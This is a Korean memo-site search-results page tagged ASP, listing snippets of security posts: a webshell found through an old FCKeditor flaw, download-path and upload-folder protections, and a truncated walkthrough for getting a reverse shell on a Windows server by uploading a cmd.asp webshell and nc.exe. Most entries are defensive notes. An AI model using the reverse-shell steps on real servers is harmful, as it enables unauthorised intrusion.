메모智 유머사진 환영합니다, 손님!    메모지 | 회원가입 | 로그인
검색도움말 메모지 검색
  재미메모智.COM 설치   •   메모智 홈   •   바깥고리   •   전체 메모智 목록   •   회원가입   •   로그인   •   도움말   •  
  메모智 검색 - ASP
검색 관련 꼬리표 구름 #ASP #ASP 웹쉘 #PHP #fckeditor #jsp #다운로드취약점 #실제경로 #자동화공격 #절대경로 #해킹
Screenshot_20151130-223538.png
FCKeditor는 아직도 중국발 자동화공격의 대상
홈페이지 취약점 점검중에 웹쉘 파일이 발견되었다. 10월27일에 두줄짜리 asp 파일이 올라왔다. 로그 확인 결과... 중국 산서성 IP에서 2008,2009년 경에 발견된 fckeditor 취약점 악용. 공격순서 1. Fckeditor 존재여부 확인 2. 이미지파일 업로드...
| 공개 | 댓글: 1 | 첨부파일: 1 | 등록자: jinsuk | 등록일: |  
파일다운로드 취약점 보안 대책 - 절대경로(full path)
1. 서버의 다운로드 스크립트내에서 다운로드 가능한 디렉토리 목록을 설정한다. 2. 다운로드를 허용하기 전에 대상 파일의 절대경로(파일시스템 상의)를 생성한다. 3. 대상 파일이 허용 디렉토리 내부 파일이 아니면 거부한다. JSP의 경우 절대경로는 getServletCo...
| 공개 | 댓글: 2 | 첨부파일: 0 | 등록자: jinsuk | 등록일: |  
윈도우 서버 쉘 따기: reverse telnet
1. 파일업로드 기능이 있는 웹쉘 업로드 (예를 들어 cmd.asp) 2. nc.exe 업로드 3. cmd.asp를 통해 nc.exe 경로확인 (dir /w /s \nc.exe) - C:\InetPub\wwwroot\board\pds\nc.exe 4. 공격자: nc.exe -l ...
| 공개 | 댓글: 0 | 첨부파일: 0 | 등록자: jinsuk | 등록일: |  
비공개 글
비공개 메모智
작성자 본인만이 볼 수 있습니다.
파일업로드 취약점 방지 방법 1: 응급 대책 - .htaccess로 스크립트 실행제한
...일을 만든다. Options -Indexes -Includes -ExecCGI AddHandler cgi-script .php .pl .py .jsp .war .asp .cer .cdx .asa .htm .shtml .phtml .sh .cgi .php3 .php4 .php5 ....
| 공개 | 댓글: 0 | 첨부파일: 0 | 등록자: jinsuk | 등록일: |  
비공개 글
비공개 메모智
작성자 본인만이 볼 수 있습니다.
비공개 글
비공개 메모智
작성자 본인만이 볼 수 있습니다.
비공개 글
비공개 메모智
작성자 본인만이 볼 수 있습니다.
비공개 글
비공개 메모智
작성자 본인만이 볼 수 있습니다.
비공개 글
비공개 메모智
작성자 본인만이 볼 수 있습니다.
현재 검색결과내 꼬리표 모음 # #.htaccess #ASP #ASP 웹쉘 #PHP #eX-DL 취약점 #eXDL #fckeditor #jsp #다운로드취약점 #보안 #실제경로 #업로드취약점 #윈도우 #자동화공격 #절대경로 #취약점 #해킹
메모智 열람: 1 / 17 (총 167 건)  [다음>1]  [다음>6]      

 

drupal hit counter

Site Stat
검색
Custom Search
모든 지식은 개인의 소유입니다.
그 외의 다른 내용은 Copyright © since 2010, 메모智.com이 가집니다.
메모지사용시 주의사항연락처powered by 크리스탈